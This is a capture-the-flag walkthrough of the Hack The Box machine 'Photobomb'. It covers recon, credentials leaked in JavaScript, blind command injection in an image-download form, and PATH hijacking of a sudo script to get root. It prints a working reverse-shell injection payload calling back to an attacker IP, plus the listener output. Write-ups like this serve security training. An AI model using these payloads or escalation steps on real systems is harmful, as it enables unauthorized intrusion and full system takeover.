Home Hack The Box - Photobomb
Post
Cancel

Hack The Box - Photobomb

Photobomb was a easy rated linux box, where plaintext credentials was discovered after viewing the source code. These credentials then lead to a webpage with download  functionality that was vulnerable to blind command injection. User was able to run the script with sudo permission and path hijacking was used to escalate privileges to root.

RECON

NMAP

Initial nmap scan discoverd ony two ports 22(ssh) and 80(http) open.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$nmap -p- --min-rate 10000 10.10.11.182 -oN photobomb.nmap 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-12 10:39 +0545 
Nmap scan report for 10.10.11.182 
Host is up (0.081s latency). 
Not shown: 65533 closed tcp ports (conn-refused) 
PORT   STATE SERVICE 
22/tcp open  ssh 
80/tcp open  http 
Nmap done: 1 IP address (1 host up) scanned in 7.02 seconds 

$nmap -p 22,80 -sC -sV --min-rate 10000 10.10.11.182 -oN photobomb-service.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-12 10:40 +0545 
Nmap scan report for 10.10.11.182 
Host is up (0.080s latency). 
PORT   STATE SERVICE VERSION 
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA) 
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA) 
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519) 
80/tcp open  http    nginx 1.18.0 (Ubuntu) 
|_http-title: Did not follow redirect to http://photobomb.htb/ 
|_http-server-header: nginx/1.18.0 (Ubuntu) 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 10.25 seconds

WEB PORT 80

on browsing the ip address http://10.10.11.182 it redirects us to photobomb.htb. so adding it to /etc/hosts

1
2
3
4
$sudo echo "10.10.11.182 photobomb.htb" >> /etc/hosts

$cat /etc/hosts
10.10.11.182    photobomb.htb

on browsing, http://photobomb.htb it disaplayed a page containing a link. This link then redirect us to a login portal at /printer.

we tried some default credentails admin:admin admin:password but it doesnot seem to work.

When trying to visit photobomb.htb/index.html or any other page that doesnot exists, it shows that sinatra does’nt know this ditty.

SOURCE CODE

viewing the source code of the photobomb.htb, there’s a photobomb.js and we found some credentials on it.

1
2
3
4
5
6
7
function init() { 
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me 
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) { 
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:[email protected]/printer'); 
  } 
} 
window.onload = init;

with these creds we can now login to /printer. After we are logged in, it dispalys a webpage that includes a several images, as well as the ability to specify their dimensions and download them.

COMMAND INJECTION

while testing for command injection, when we add sleep 5 on photo or dimension parameter we get 500 server error response.

But when we add sleep 5 on filetype parameter we get response after 5400 milisecs, this confirms that there’s a command injection vulnerability.

SHELL AS WIZARD

On replacing sleep 5 with our reverse shell we got shell as wizard user.

1
photo=masaaki-komori-NYFaNoiPf7A-unsplash.jpg&filetype=png%3bbash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/4444+0>%261'&dimensions=150x100
1
2
3
4
5
6
$sudo nc -lvnp 4444 
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.182] 55200
bash: cannot set terminal process group (734): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$ 

SHELL AS ROOT

On running sudo -l, the output shows that the user wizard can run /opt/cleanup.sh with sudo permissions and without password.

1
2
3
4
5
6
7
8
wizard@photobomb:~$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

PATH HIJACKING

/opt/cleanup.sh

We cannot edit the contents of /opt/cleanup.sh but we can read it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

On analysing, the cleaup.sh script we can see that there’s a path hijacking. Here, all the binaries are referenced with the full path except find. That means, bash will look for binaries in $PATH and find will run from /usr/bin/find.

1
2
3
4
5
wizard@photobomb:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

wizard@photobomb:/tmp$ which find
/usr/bin/find

creating find file in /tmp and making it executable.

1
2
3
4
5
6
7
8
wizard@photobomb:/tmp$ pwd
/tmp
wizard@photobomb:/tmp$ cat find
#!/bin/bash

bash

wizard@photobomb:/tmp$ chmod +x find

now we can run cleanup.sh with sudo permission but set the PATH variable to /tmp and get a root shell.

1
2
wizard@photobomb:/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb#
This post is licensed under CC BY 4.0 by the author.

Hack The Box - Querier

Hack The Box - Shoppy

Comments powered by Disqus.